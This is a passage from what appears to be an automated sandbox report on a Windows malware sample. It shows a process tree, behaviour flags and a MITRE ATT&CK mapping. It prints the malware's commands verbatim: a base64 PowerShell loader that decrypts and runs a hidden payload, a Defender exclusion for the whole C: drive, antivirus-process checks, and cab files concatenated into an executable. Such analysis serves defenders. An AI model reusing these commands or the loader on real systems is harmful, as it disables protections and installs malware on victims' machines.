AgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2428
      - C:\Users\Admin\AppData\Local\Temp\10382150101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382150101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1480
      - C:\Users\Admin\AppData\Local\Temp\10382160101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382160101\TbV75ZR.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5772
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:2460
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5488
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3968
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3968 -s 524
        8⤵
        Program crash
        
        PID:3212
      - C:\Users\Admin\AppData\Local\Temp\10382170101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382170101\7IIl2eE.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1400
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5924
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1848
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2500
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3192
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4300
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4516
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4468
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2300
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3176
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5288
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4044
      - C:\Users\Admin\AppData\Local\Temp\10382180101\u75a1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382180101\u75a1_003.exe"
        6⤵
        Executes dropped EXE
        
        PID:4608

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4632

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3968 -ip 3968
1⤵
PID:1900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion